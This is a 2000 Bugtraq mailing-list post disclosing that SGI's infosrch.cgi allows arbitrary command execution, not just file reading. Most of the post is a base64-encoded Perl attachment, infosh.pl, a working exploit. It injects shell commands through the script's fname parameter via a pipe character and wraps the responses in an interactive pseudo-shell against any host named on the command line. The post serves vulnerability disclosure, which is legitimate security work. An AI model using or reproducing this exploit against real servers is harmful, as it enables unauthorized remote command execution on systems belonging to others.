[15008] in bugtraq
infosrch.cgi 'interactive' shell
daemon@ATHENA.MIT.EDU (rpc)
Wed May 24 13:03:36 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-2117205544-125550116-959119897=:29022"
Message-Id: <Pine.LNX.4.10.10005231507450.29022-200000@inetarena.com>
Date: Tue, 23 May 2000 15:11:37 -0700
Reply-To: rpc <rpc@INETARENA.COM>
From: rpc <rpc@INETARENA.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---2117205544-125550116-959119897=:29022
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello All,
SGI's security advisory regarding infosrch.cgi minimizes the actual
vulnerability. Not only does it allow you to view any file on the system,
an attacker can easily run arbitrary commands. Attached is a simple perl
script that demonstrates this.
--rpc <h@ckz.org>
---2117205544-125550116-959119897=:29022
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="infosh.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10005231511370.29022@inetarena.com>
Content-Description:
Content-Disposition: attachment; filename="infosh.pl"
IyEvdXNyL2Jpbi9wZXJsIC13DQojIGluZm9zZWFyY2guY2dpIGludGVyYWN0
aXZlIHNoZWxsLiANCiMgdXNhZ2U6IC4vaW5mb3NoLnBsIGhvc3RuYW1lDQoj
IDMvNC8wMA0KIyAtLXJwYyA8aEBja3oub3JnPg0KDQp1c2UgSU86OlNvY2tl
dDsNCnVzZSBDR0kgIjplc2NhcGUiOw0KJHwrKzsNCg0KZGllICJ1c2FnZTog
JDAgaG9zdFxuIiB1bmxlc3MoQEFSR1YgPT0gMSk7DQooJGhvc3QpID0gc2hp
ZnQgQEFSR1Y7DQoNCiRjZ2kgPSAiL2NnaS1iaW4vaW5mb3NyY2guY2dpP2Nt
ZD1nZXRkb2MmZGI9bWFuJmZuYW1lPXwiOw0KDQojIHVybCBlbmNvZGUgYW5k
IHNlbmQgYSBjb21tYW5kLg0Kc3ViIHNlbmRfY21kDQp7DQoJbXkoJHVybF9j
b21tYW5kKSA9ICRjZ2kgLiBDR0k6OmVzY2FwZShzaGlmdCk7DQoJJHMgPSBJ
Tzo6U29ja2V0OjpJTkVULT5uZXcoUGVlckFkZHI9PiRob3N0LFBlZXJQb3J0
PT44MCxQcm90bz0+InRjcCIpOw0KCWlmKCEkcykgeyBkaWUgImRlbmllZC5c
biI7IH0JDQoJcHJpbnQgJHMgIkdFVCAkdXJsX2NvbW1hbmQgSFRUUC8xLjBc
clxuIjsNCglwcmludCAkcyAiVXNlci1BZ2VudDogXHJcblxyXG4iOw0KCUBy
ZXN1bHQgPSA8JHM+Ow0KCXNoaWZ0IEByZXN1bHQgdW50aWwgJHJlc3VsdFsw
XSA9fiAvXlxyXG4vOyAjIHVuaW50ZXJlc3RpbmcgZGF0YS4gDQoJc2hpZnQg
QHJlc3VsdDsgJCNyZXN1bHQtLTsJCQ0KcmV0dXJuIEByZXN1bHQ7DQp9DQoN
CiMgZHJhdyBhIHBzZXVkbyBwcm9tcHQuIGkgbGlrZSAiXGg6XHcgXCQgIi4N
CnN1YiBwcm9tcHQNCnsNCglAcmVzID0gc2VuZF9jbWQoIi9zYmluL3B3ZCIp
OwkNCgljaG9tcCgkcHdkID0gJHJlc1swXSk7DQoJcHJpbnQgIiRob3N0OiIs
ICRwd2QsICJcJCAiOw0KfQ0KDQpwcm9tcHQ7DQp3aGlsZSghZW9mKFNURElO
KSkgew0KCWNob21wKCRjbWQgPSA8U1RESU4+KTsNCglwcmludCBzZW5kX2Nt
ZCgkY21kKTsNCglwcm9tcHQ7DQp9CSANCg==
---2117205544-125550116-959119897=:29022--
